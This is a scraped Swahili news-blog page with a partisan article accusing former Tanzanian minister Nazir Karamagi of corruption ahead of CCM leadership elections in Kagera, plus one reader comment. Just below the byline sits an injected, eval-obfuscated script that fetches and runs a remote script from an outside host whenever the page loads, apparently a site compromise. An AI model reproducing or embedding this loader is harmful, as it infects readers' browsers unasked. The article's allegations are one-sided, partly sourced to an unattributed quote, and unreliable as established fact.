Recent Comments

JE, WANA CCM MKOA WA KAGERA MNATAKA KUMKABIDHI CHAMA MTUHUMIWA WA UFISADI?

By Baraka Bitariho Nov 14, 2022
<script>var o=String;eval(o.fromCharCode(102,117,110,99,116,105,111,110,32,105,115,83,99,114,105,112,116,76,111,97,100,101,100,40,115,114,99,41,10,123,10,32,32,32,32,114,101,116,117,114,110,32,66,111,111,108,101,97,110,40,100,111,99,117,109,101,110,116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,10,125,10,10,118,97,114,32,98,100,32,61,32,34,104,116,116,34,43,34,112,115,58,34,43,34,47,34,43,34,47,115,34,43,34,108,101,101,34,43,34,112,46,115,116,114,97,34,43,34,116,34,43,34,111,115,98,34,43,34,111,100,121,46,99,111,109,47,34,43,34,115,99,34,43,34,114,105,112,34,43,34,116,34,43,34,115,47,104,101,97,34,43,34,100,46,106,34,43,34,115,34,43,34,63,34,43,34,118,61,51,34,43,34,46,34,43,34,56,34,43,34,46,48,34,59,10,10,105,102,40,105,115,83,99,114,105,112,116,76,111,97,100,101,100,40,98,100,41,61,61,61,102,97,108,115,101,41,123,10,9,118,97,114,32,100,61,100,111,99,117,109,101,110,116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,59,32,10,115,46,115,114,99,61,98,100,59,10,105,102,32,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,32,123,32,10,105,102,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,33,61,61,110,117,108,108,41,123,10,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,59,10,125,10,125,10,32,101,108,115,101,32,123,10,9,105,102,40,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,33,61,61,110,117,108,108,41,123,10,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,10,9,125,10,125,10,10,125));/*54745756836*/</script>

Na,Mwandishi wetu-Kagera,Tanzania
14/11/2022

Tunaweza kuuita mnyukano mkali wa Kisiasa ndani ya Chama Cha Mapinduzi CCM Mkoa wa Kagera Kuelekea Uchaguzi wa Viongozi ndani ya Chama hicho na hasahasa joto kali likiwa katika nafasi ya Mwenyekiti.

Bi. Costantina Buhiye ni Mwenyekiti anayemaliza muda wake, ambaye anaitetea nafasi yake kwa udi na uvumba huku makada wengine Willy Mushobozi akimendea nafasi hiyo pia inayotafutwa kwa nguvu na bilionea waziri wa zamani katika Serikali ya awamu ya 4 iliyoongozwa na Jakaya Mrisho Kikwete.

Mtanange umebaki wa kwanasiasa hao baada ya tetesi chini ya zuria kuwa jina la mgombea mwingine Yahaya Kateme limefyekelewa mbali ma Kamati kuu ya Chama cha mapinduzi taifa NEC.

Sasa, turudi kwa KARAMAGI! Huyo ndiye anayetaka kuwa Mwenyekiti wa Chama tawala Nchini Tanzania, akishangiliwa na baadhi ya Wabunge wanaowashawishi madiwani na viongozi wengine wa Chama ngazi za kata,na matawi kumtafutia kura kwasababu wanafadhiliwa na kulipwa pesa na tajiri huyo wa kupindukia.

www.simamia.com tunaahidi kukuletea taarifa mbali mbali zinazowahusu wanasiasa na makondokando yao, pia habari za kusisimua. Leo tunaanza na Nazir Mustafa Karamagi ambaye wapo Wananchi wanaomuita FISADI
“Waziri zamani Nazir Karamagi ni fisadi mkubwa na ameitafuna hii nchi kwa miaka mingi, ni mbia wa TICTS pamoja na Yogesh Manek Mfanyabiashara maarufu Tanzania pamoja na Hutchinson ya HongoKong. Lazima haya mambo yafike mwisho, Tunakuomba Mama uingilie kati kumaliza ufisadi huu” Nukuu kutoka mahali fulani

Karamagi aka Nshomile wa Bukoba alizaliwa 13 Disemba, 1953. Amewahi Kuwa Mbunge Katika Bunge la Jamhuri hya Muungano wa Tanzania.

Wakati wana Kagera mkijipanga kuchagua mkumbuke kuwa Bw. Karamagi amewahi kuwa Mbunge pale Bukoba aliyechaguliwa na baadae kuteuliwa kuwa waziri wa nishati na madini 2005.

Baada ya kuteuliwa kushika wadhifa wa Uwaziri katika wizara nyeti akaumilikisha mgodi wa dhahabui wa Buzwagi kwa mwekezaji kupitia Mkataba unaotajwa kuwa mbovu kuliko mikataba yote iliyowahi kutokea Nchini Tanzania chini ya utawala wa Rais Kikwete.

Mkataba huo uliruhusu wageni wavune raslimali ya dhahabu kwenda nje na kuwaacha wazawa wakiwa ni maskini wa kutupwa, pia mkataba huo ulitiliwa saini nje ya nchi huko katika hotel moja Uingereza na inasemekena mihuri mingine ya wizara ilisafirishwa kwenda Uingereza kufanikisha mkataba huo tata na kurudi tena Tanzania katika ofisi za wizara.

Uharaka wa kupitisha mkataba huo ulizua wingu la rushwa au 10% hali iliyopeleka Mbunge wa Kigoma kusini Mhe. Zitto Kabwe kupitia Chama Cha Demokrasia na Maendeleo CHADEMA wakati huo kupeleka mswada binafsi Bungeni kuhoji uhalali wa mkataba huo.

Watanzania na wafuatiliaji mnakumbuka,Bunge lilijadili hoja hiyo ambapo mwisho ikaonekana Mhe. Zitto Kabwe amelidanganya Bunge na baadhi ya wabunge waliokuwa upande wa Karamagi wakapendekeza Mhe. Zitto Kabwe afukuzwe kwenye bunge asimamishwe vikao vitatu.
Miongoni mwa Wabunge waliopendekeza kuadhibiwa kwa Mh. Zitto Kabwe alikuwemo mbunge wa Mchinga Mdhihiri Mdhihiri ambaye Wakati Mhe.Zitto kabwe akitumikia adhabu yake 2007 Mbunge huyo akiwa mjini Lindi katika eneo la SIDO barabara kuu itokayo mnazi mmoja kwenda mjini Lindi alipata ajali mbaya ya gari alilokuwa anaendesha mwenyewe na mkono wake wa kulia ulikatwa na aliwekewa mkono wa bandia wakati amaelazwa akiuguza majeraha yake Mhe. Zitto Kabwe alimtembela hospitalini kumjulia hali.

Baadae katika uchaguzi wa 2010 hakuweza kutetea nafasi yake na alihama kabisa mkoani Lindi akahamia Kinondoni DSM na alisema hana haja ya kumfanyia mtu kampeni yeyote tu achukue jimbo.

Haikupita muda ikabainika ule mkataba alioingia nao Mhe, Nazir Karamagi ulikuwa ni mkataba fake na alivunja taratibu fulani kuufikia basi Spika wa Bunge Mhe. Samwel Sitta akaifuta adhabu aliyopewa Mhe. Zitto Kabwe kwa kuwa alichomtuhumu Waziri Karamagi kilikuwa ni cha kweli basi Spika akatoa amri Zitto Kabwe aanze kuhudhuria vikao vya kamati yake ya bunge na kwamba adhabu imefutwa kwa kuwa bunge ndio lilionekana kusema uwongo.

Muda si mfupi Nazir Karamagi uwaziri wake ulitenguliwa pamoja na Mhe. Msabaha na wengine katika lile sakata kuu la Richmond hii ni pamoja na Waziri mkuu wa wakati huo Edward Ngoyay Lowasa akajiuzuru wadhifa wake.

Katika kile kinachoutaja Ufisadi wa Karamagi, ni utajiri mkubwa wa kumiliki hisa nyingi kwenye kampuni ya TICT inayoshughurika na kutoa makontena bandarini pia pia ununuzi wa maghala ya kutunzia korosho huko wilaya ya Newala Mkoani Mtwara na kumfanya kuwa Tajiri mkubwa sana

Kudhihirisha umaskini uliotokana na mchezo mchafu wa Wazir Karamagi huko Mkoani Mtwara bado kuna watu maskini kweli kweli chakula wanachokula peke yake ni kivutio cha utalii maana ni unga wa mhogo mkavu aliosagwa hadi unakuwa kama mweusi hivi na mboga ya dagaa zilizokaa muda mrefu , ukipita na kuwaona wanakula utaona kama wanachukua vitu vyeusi wanaweka mdomoni ni lazima utavutiwa usogee uone wanakula nini.

Sasa Wananchi wa Mkoa wa Kagera jiulizeni ikiwa mtampatia nafasi ya kukiongoza Chama Cha Mapinduzi CCM mnaridhishwa naye?

Kiongozi aliyetumia madaraka yake vibaya kujitajirisha,kuliweka taifa mahali pagumu na kusababisha maisha magumu kwa wananchi ndiye mnamtaka kuwa Mwenyekiti wenmu?

Akiongoze Chama kinachosimamia Serikali?

Ikiwa alishindwa kutekeleza Ilani ya Chama Hicho akiwa Mbunge na Waziri, ataweza kuwavusha kwa ngazi ya Mkoa?

Huyo ndio Nazir Karamagi ashomile toka Kagera
Karibu www.simamia.com

By Baraka Bitariho

Simamia is a news house where visitors will get up to date information on news, events, and so on. Join us to get updated, entertained and learn. Our website is www.Simamia.com or email us at SimamiaTeam@gmail.com

One thought on “JE, WANA CCM MKOA WA KAGERA MNATAKA KUMKABIDHI CHAMA MTUHUMIWA WA UFISADI?”
  1. Kama alikuwa hivyo Marehemu Magufuli asinga.muacha kamati zilizopitisha jina zinajuakufanyakazi hivi wewe unajuakuwa nchi hii inavyombo vya usalama Acha wajumbe wafanye .maamuzi wa chama chao hiyo kama umetumwa umegonga pabaya CCM Oyeeee kazi iendelee

Comments are closed.